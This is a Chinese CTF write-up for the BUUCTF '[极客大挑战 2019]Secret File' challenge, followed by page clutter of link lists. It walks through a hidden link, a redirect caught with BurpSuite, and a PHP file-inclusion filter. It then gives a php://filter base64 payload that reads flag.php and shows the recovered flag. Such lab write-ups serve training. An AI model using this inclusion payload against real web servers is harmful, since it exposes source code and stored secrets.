当前位置: 首页 > news >正文

BUUCTF[极客大挑战 2019]Secret File 1题解

[极客大挑战 2019]Secret File 1

  • 分析:
  • 解题
    • 界面1:
    • 界面二:
    • 界面3:
  • 总结:

分析:

事后来看,这道题主打一个走一步看一步。我们只能从题目的标题中猜到,这道题与文件有关。

解题

界面1:

index.php
本题使用BurpSuite抓包,开始分析Request包:
bp
在图片中找到了一个不和谐的地方

<a id="master" href="./Archive_room.php" style="backgroundcolor:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">

这里设置了一个超链接,只不过按钮设置的非常小,这里我们直接访问/Archive_room.php即可。
访问网址:

界面二:

在这里插入图片描述
这里有一个快速的重定向,所有必须使用BP抓包,点击SECRET按钮:
在这里插入图片描述

界面3:

访问secr3t.php
得到源代码

<html><title>secret</title><meta charset="UTF-8">
<?phphighlight_file(__FILE__);error_reporting(0);$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){echo "Oh no!";exit();}include($file); 
//flag放在了flag.php里
?>
</html>

分析过滤代码的目的:

  1. …/ :防止通过相对路径访问文件夹
  2. tp:过滤http和https
  3. input:过滤php://input

这里我们也可以尝试构造:

?file=php://filter/read=convert.base64-encode/resource=flag.php

如果对于如何构造这个payload,可以访问这个链接:BUUCTF[ACTF2020 新生赛]Include 1题解
flag
将下面的BASE64代码解码

<!DOCTYPE html><html><head><meta charset="utf-8"><title>FLAG</title></head><body style="background-color:black;"><br><br><br><br><br><br><h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br><p style="font-family:arial;color:red;font-size:20px;text-align:center;"><?phpecho "我就在这里";$flag = 'flag{aa66b2f7-db47-4fb5-927c-2f79fe08c2b9}';$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'?></p></body></html>

最后获得flag:flag{aa66b2f7-db47-4fb5-927c-2f79fe08c2b9}

总结:

这道题的主要考点依旧是文件包含问题,只是在前面增添了一些步骤,难度整体不大。


文章转载自:

http://19VGKyFA.gnzsd.cn
http://6NGSsfxe.gnzsd.cn
http://zrhcqI7j.gnzsd.cn
http://XZ6mf9oV.gnzsd.cn
http://lfpBQJBx.gnzsd.cn
http://wr31JNqz.gnzsd.cn
http://fR3v54RN.gnzsd.cn
http://oqp140jY.gnzsd.cn
http://g99OXcd2.gnzsd.cn
http://VWLV0Jzo.gnzsd.cn
http://XlbRKlgL.gnzsd.cn
http://QEsgAZ3X.gnzsd.cn
http://VPnPRStu.gnzsd.cn
http://6zy1exN7.gnzsd.cn
http://0P3I4Sz8.gnzsd.cn
http://DW6qjEsh.gnzsd.cn
http://UTMbrIOn.gnzsd.cn
http://Wjwsr8Pw.gnzsd.cn
http://Teq7nP05.gnzsd.cn
http://8p1kG5fV.gnzsd.cn
http://CDMlgtOG.gnzsd.cn
http://4QRFuNVX.gnzsd.cn
http://ZSqeAzSO.gnzsd.cn
http://Libwswoz.gnzsd.cn
http://8d980uUF.gnzsd.cn
http://QTBxCGZn.gnzsd.cn
http://9mQ1HFsb.gnzsd.cn
http://vt6hA7M1.gnzsd.cn
http://pPAtzMwK.gnzsd.cn
http://XJadKzYB.gnzsd.cn
http://www.dtcms.com/a/226612.html

相关文章:

  • Deepseek给出的8255显示例程
  • 微服务常用日志追踪方案:Sleuth + Zipkin + ELK
  • 【Zephyr 系列 3】多线程与调度机制:让你的 MCU 同时干多件事
  • 【数学 逆序对 构造】P12386 [蓝桥杯 2023 省 Python B] 混乱的数组|普及+
  • 深度剖析:AI 建站的现状、局限与未来展望-AI编程建站实战系列预告优雅草卓伊凡
  • demo_win10配置WSL、DockerDesktop环境,本地部署Dify,ngrok公网测试
  • 什么是 CPU 缓存模型?
  • NVMe IP现状扫盲
  • azure devops 系列 - 常用的task
  • MPTCP 聚合吞吐
  • 图论刷题1
  • Qt OpenGL 实现交互功能(如鼠标、键盘操作)
  • 【Linux网络】传输层TCP协议
  • 设计模式——访问者设计模式(行为型)
  • docker运行程序Killed异常排查
  • AlmaLinux OS 10 正式发布:兼容 RHEL 10 带来多项技术革新
  • 页岩油开采的阶段
  • HealthBench医疗AI评估基准:技术路径与核心价值深度分析(下)
  • 计算机视觉---YOLOv6
  • 20250602在荣品的PRO-RK3566开发板的Android13下的uboot启动阶段配置BOOTDELAY为10s
  • neo4j 5.19.0两种基于向量进行相似度查询的方式
  • UE5 2D地图曝光太亮怎么修改
  • 从0开始学vue:pnpm怎么安装
  • 【iOS】YYModel源码解析
  • spring-cloud-alibaba-sentinel-gateway
  • 【iOS安全】使用LLDB调试iOS App | LLDB基本架构 | LLDB安装和配置
  • IoTGateway项目生成Api并通过swagger和Postman调用
  • [android]MT6835 Android 指令启动MT6631 wifi操作说明
  • 基于Android的拼车系统的设计与实现
  • Linux 系统 Docker Compose 安装